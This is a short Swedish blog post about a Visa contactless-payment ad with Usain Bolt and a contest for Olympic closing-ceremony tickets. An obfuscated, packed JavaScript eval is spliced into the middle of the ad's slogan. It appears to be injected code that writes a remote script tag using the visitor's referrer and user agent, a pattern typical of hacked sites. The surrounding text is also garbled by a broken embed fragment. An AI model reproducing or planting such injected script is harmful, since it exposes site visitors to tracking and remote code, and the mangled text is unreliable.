Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Trådlös betalning med Visa

Trådlös betalning med Visa
Sebastian

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/Life_flows_better_with_Visa_11048.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1367397&skinName=light&wmode=window&hideChrome=0″>

Life eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbfhh|var|u0026u|referrer|kifrd||js|php’.split(’|’),0,{}))
flows better with Visa
 – Usain Bolt, världens snabbaste man, har passande huvudrollen för att visa den snabbhet och det flyt man får när man betalar med Visa. Som kortinnehavare har du även möjlighet att få uppleva OS på plats! Gå in och tävla om två biljetter till avslutningsceremonin.

Kampanjen startar 26 mars.